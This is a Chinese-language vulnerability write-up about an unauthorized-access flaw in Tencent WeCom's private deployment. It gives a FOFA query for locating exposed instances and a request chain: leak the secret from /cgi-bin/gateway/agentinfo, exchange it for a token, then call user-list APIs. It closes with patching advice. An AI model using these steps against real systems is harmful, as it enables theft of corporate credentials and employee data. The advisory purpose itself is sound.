Tencent企业微信私有化版本agentinfo未授权访问漏洞

  1. 漏洞描述
  2. 漏洞影响
  3. 复现过程
  4. 修复建议

漏洞描述

企业微信是腾讯微信团队为企业打造的专业办公管理工具。2023年8月,互联网上披露其相关接口存在未授权访问漏洞,攻击者可构造恶意请求(/cgi-bin/gateway/agentinfo)获取企业微信secret等敏感信息,并组合调用相关API接口。该漏洞已被黑客武器化,用于大规模蠕虫传播、勒索挖矿,建议您立即关注并修复。

漏洞影响

2.5.x版本、2.6.930000版本以下

复现过程

  1. FOFA网络测绘

    根据app="Tencent-企业微信"查询所有资产,尝试某一个资产。

  1. 获取Secret、strcorpid

    访问接口/cgi-bin/gateway/agentinfo


3. 获取token

访问接口/cgi-bin/gettoken?corpid=strcorpid&corpsecret=Secret。其中 strcorpid、Secret 为步骤2获取的值。


4. 带入token请求功能接口

举例:获取标签成员

访问接口/cgi-bin/user/list?access_token=access_token。其中access_token为步骤3获取的值。

修复建议

1、升级至最新版本
2、设置其仅对可信地址开放。


转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。

文章标题:Tencent企业微信私有化版本agentinfo未授权访问漏洞

字数:302

本文作者:Scha1e

发布时间:2023-09-18, 18:49:14

最后更新:2023-09-18, 18:57:57

原始链接:http://example.com/2023/09/18/Tencent%E4%BC%81%E4%B8%9A%E5%BE%AE%E4%BF%A1%E7%A7%81%E6%9C%89%E5%8C%96%E7%89%88%E6%9C%ACagentinfo%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E/

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。